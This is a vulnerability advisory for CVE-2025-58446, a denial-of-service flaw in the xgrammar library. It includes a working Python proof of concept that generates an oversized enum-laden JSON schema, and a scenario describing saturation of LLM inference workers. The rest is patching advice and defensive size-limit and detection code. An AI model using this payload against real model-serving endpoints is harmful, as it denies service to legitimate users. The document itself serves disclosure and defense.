CVE-2025-58446: xgrammar: DoS via oversized JSON schema grammar parsing

GHSA-9q5r-wfvf-rr7f · Severity: MEDIUM · PoC available · CISA SSVC: Track*
Published September 5, 2025
CISO Take

xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.

Risk Assessment

Effective risk is medium-high for exposed inference endpoints, despite the medium CVSS. The attack surface is any API that accepts caller-supplied JSON schemas for structured generation — a common pattern in agentic and enterprise LLM deployments. EPSS is very low (0.00091), suggesting no current active exploitation, but the PoC is fully public and requires zero AI/ML expertise to execute. Impact is availability, not confidentiality — a single malicious request can monopolize an inference thread for minutes, enabling throughput starvation against multi-tenant or high-availability deployments.

Affected Systems

Package: xgrammar
Ecosystem: pip
Vulnerable range: = 0.1.23
Patched: 0.1.24

152 dependents · 100% patched · ~5 days to patch

If any of your services use xgrammar v0.1.23, they are affected.

Severity & Risk

CVSS 3.1: N/A (no score assigned)
EPSS: 0.1% (0.00091) chance of exploitation within 30 days; higher than 26% of all CVEs
Exploitation status: exploit available
Exploitation likelihood: MEDIUM
Sophistication: trivial
Exploitation confidence: medium
CISA SSVC: public PoC (indexed in trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps
  1. Patch

    Upgrade xgrammar to v0.1.24 or later; the fix speeds up the grammar optimizer and disables its slower optimization passes for large grammars.

  2. Short-term workaround

    Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema().

  3. Rate limiting

    Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.

  4. Detection

    Alert on grammar parsing durations exceeding 10 seconds; durations this long are anomalous for legitimate schemas and a strong indicator of exploitation.

  5. Audit exposure

    Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.
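The short-term workaround in step 2 can be sketched as a simple byte-size gate that rejects oversized schemas before grammar compilation ever runs. The 50 KB cap, the function name, and the commented call site are illustrative assumptions, not part of xgrammar's API:

```python
import json

MAX_SCHEMA_BYTES = 50 * 1024  # illustrative 50 KB cap from step 2

def guarded_schema(schema: dict) -> str:
    """Serialize a caller-supplied schema, rejecting oversized payloads
    before they reach grammar compilation."""
    serialized = json.dumps(schema)
    if len(serialized.encode("utf-8")) > MAX_SCHEMA_BYTES:
        raise ValueError(
            f"JSON schema exceeds {MAX_SCHEMA_BYTES}-byte limit; "
            "rejecting before grammar compilation"
        )
    return serialized

# Hypothetical call site at the inference layer:
# grammar = xgr.Grammar.from_json_schema(guarded_schema(user_schema),
#                                        strict_mode=True)
```

Placing this check at the API gateway rather than inside the model server keeps malicious schemas from consuming any inference-layer resources at all.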

CISA SSVC Assessment

Decision Track*
Exploitation poc
Automatable Yes
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.6 - AI system operation and monitoring A.8.4 - AI system resources
NIST AI RMF
MANAGE-2.4 - Risks and benefits of the AI system are communicated to relevant AI actors MEASURE-2.5 - AI system to be deployed satisfies its requirements for availability
OWASP LLM Top 10
LLM04 - Model Denial of Service

Frequently Asked Questions

What is CVE-2025-58446?

xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.

Is CVE-2025-58446 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-58446, increasing the risk of exploitation.

How to fix CVE-2025-58446?

1. **Patch**: Upgrade xgrammar to v0.1.24 or later; the fix speeds up the grammar optimizer and disables its slower optimization passes for large grammars.
2. **Short-term workaround**: Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema().
3. **Rate limiting**: Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.
4. **Detection**: Alert on grammar parsing durations exceeding 10 seconds; durations this long are anomalous and may indicate exploitation.
5. **Audit exposure**: Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.

What systems are affected by CVE-2025-58446?

This vulnerability affects the following AI/ML architecture patterns: model serving, structured output pipelines, LLM inference APIs, agentic tool-calling pipelines.

What is the CVSS score for CVE-2025-58446?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary

A grammar that would fit in the context window of most models takes minutes to process in v0.1.23. In testing, v0.1.16 parsed the same grammar fine, so this appears to be a regression introduced alongside the Earley parser.

### Details

A full reproducer is provided in the PoC section. The resulting grammar is around 70k tokens, and grammar parsing alone (with the models checked) took significantly longer than the LLM inference itself, meaning this can be used to DoS model providers.

### Patch

The root cause is the grammar optimizer introduced in v0.1.23 being too slow. The slowdown only occurs for very large grammars (>100k characters), like the one below. v0.1.24 resolves it by speeding up the grammar optimizer and disabling some slow optimizations for large grammars. Thanks to @Seven-Streams.

### PoC

```python
import json
import random
import string

import xgrammar as xgr


def enum_schema(size=10000, str_len=10):
    # One enum of `size` random 10-character strings, referenced eight
    # times -- the serialized schema easily exceeds 100k characters.
    enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len))
                     for _ in range(size)]}
    schema = {
        "definitions": {"colorEnum": enum},
        "type": "object",
        "properties": {
            "color1": {"$ref": "#/definitions/colorEnum"},
            "color2": {"$ref": "#/definitions/colorEnum"},
            "color3": {"$ref": "#/definitions/colorEnum"},
            "color4": {"$ref": "#/definitions/colorEnum"},
            "color5": {"$ref": "#/definitions/colorEnum"},
            "color6": {"$ref": "#/definitions/colorEnum"},
            "color7": {"$ref": "#/definitions/colorEnum"},
            "color8": {"$ref": "#/definitions/colorEnum"},
        },
        "required": ["color1", "color2"],
    }
    return schema


schema_enum = enum_schema()
print(schema_enum)
print(test_schema(schema_enum, {}))
```

where:

```python
def test_schema(schema, instance):
    # Grammar compilation is the slow step on v0.1.23.
    grammar = xgr.Grammar.from_json_schema(
        json.dumps(schema), strict_mode=True
    )
    # _is_grammar_accept_string is a helper from xgrammar's test
    # utilities; its definition is not shown in the advisory.
    return _is_grammar_accept_string(grammar, json.dumps(instance))
```

### Impact

Denial of service (DoS).

Exploitation Scenario

An adversary targeting a multi-tenant LLM API (e.g., an enterprise copilot or structured data extraction service) crafts a JSON schema with thousands of enum values totaling over 100k characters — trivially generated with the public PoC. They submit this as the response_format schema in a constrained generation request. The xgrammar optimizer enters a slow computation path, blocking the inference thread for several minutes. By issuing a small number of concurrent requests (5–10), the attacker can saturate all inference workers, causing complete service unavailability for legitimate users. The attack costs pennies in compute and requires no authentication bypass or specialized knowledge, only awareness of the library version and the public PoC.
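Because the attack manifests as abnormally long grammar compilation, the detection guidance above (step 4) can be sketched as a timing wrapper around the compile call. The function name `timed_compile`, the logger name, and the 10-second threshold are assumptions for illustration, not part of xgrammar:

```python
import logging
import time

logger = logging.getLogger("grammar_dos_detector")
SLOW_PARSE_THRESHOLD_S = 10.0  # per the detection guidance above

def timed_compile(compile_fn, schema_json: str):
    """Run a grammar-compilation callable and emit an alert when it
    exceeds the anomaly threshold, a signal consistent with
    CVE-2025-58446 abuse."""
    start = time.perf_counter()
    try:
        return compile_fn(schema_json)
    finally:
        elapsed = time.perf_counter() - start
        if elapsed > SLOW_PARSE_THRESHOLD_S:
            logger.warning(
                "Grammar compilation took %.1fs (>%.0fs threshold), "
                "schema size=%d bytes -- possible DoS attempt",
                elapsed, SLOW_PARSE_THRESHOLD_S, len(schema_json),
            )

# Hypothetical usage at the serving layer:
# grammar = timed_compile(
#     lambda s: xgr.Grammar.from_json_schema(s, strict_mode=True),
#     schema_json)
```

Routing the warning to an existing alerting pipeline gives operators a per-request signal even before an upgrade to v0.1.24 lands.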

Timeline

Published
September 5, 2025
Last Modified
September 10, 2025
First Seen
March 24, 2026

Related Vulnerabilities